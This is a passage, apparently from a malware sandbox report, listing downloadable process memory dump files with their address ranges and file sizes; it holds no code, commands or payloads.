4.2MB

Download
memory/4720-166-0x00000000022C4000-0x00000000022CC000-memory.dmp

Filesize
32KB

Download
memory/4720-149-0x00000000022C4000-0x00000000022CC000-memory.dmp

Filesize
32KB

Download
memory/4720-167-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/4720-168-0x0000000000400000-0x000000000214A000-memory.dmp

Filesize
29.3MB

Download
memory/4720-209-0x0000000000400000-0x0000000002584000-memory.dmp

Filesize
33.5MB

Download
memory/4860-222-0x00000000042A2000-0x00000000042A3000-memory.dmp

Filesize
4KB

Download
memory/4860-218-0x00000000721B0000-0x0000000072960000-memory.dmp

Filesize
7.7MB

Download
memory/4860-219-0x00000000042A0000-0x00000000042A1000-memory.dmp

Filesize
4KB

Download
memory/4860-144-0x00000000021E4000-0x0000000002207000-memory.dmp

Filesize
140KB

Download
memory/4860-211-0x00000000021E4000-0x0000000002207000-memory.dmp

Filesize
140KB

Download
memory/4860-213-0x00000000001D0000-0x0000000000200000-memory.dmp

Filesize
192KB

Download
memory/4860-214-0x0000000000400000-0x000000000215D000-memory.dmp

Filesize
29.4MB

Download
memory/4860-163-0x0000000007480000-0x00000000074BC000-memory.dmp

Filesize
240KB

Download
memory/4860-160-0x0000000007350000-0x0000000007362000-memory.dmp

Filesize
72KB

Download
memory/4860-224-0x00000000042A4000-0x00000000042A6000-memory.dmp

Filesize
8KB

Download
memory/4860-162-0x0000000007370000-0x000000000747A000-memory.dmp

Filesize
1.0MB

Download
memory/4860-157-0x0000000006CC0000-0x00000000072D8000-memory.dmp

Filesize
6.1MB

Download
memory/4860-155-0x0000000006710000-0x0000000006CB4000-memory.dmp

Filesize
5.6MB

Download
memory/4860-223-0x00000000042A3000-0x00000000042A4000-memory.dmp

Filesize
4KB

Download
memory/4960-188-0x0000000000400000-0x0000000002584000-memory.dmp

Filesize
33.5MB

Download
memory/4960-179-0x00000000029DF000-0x0000000002E1C000-memory.dmp

Filesize
4.2MB

Download
memory/4960-182-0x0000000002E20000-0x0000000003747000-memory.dmp

Filesize
9.2MB

Download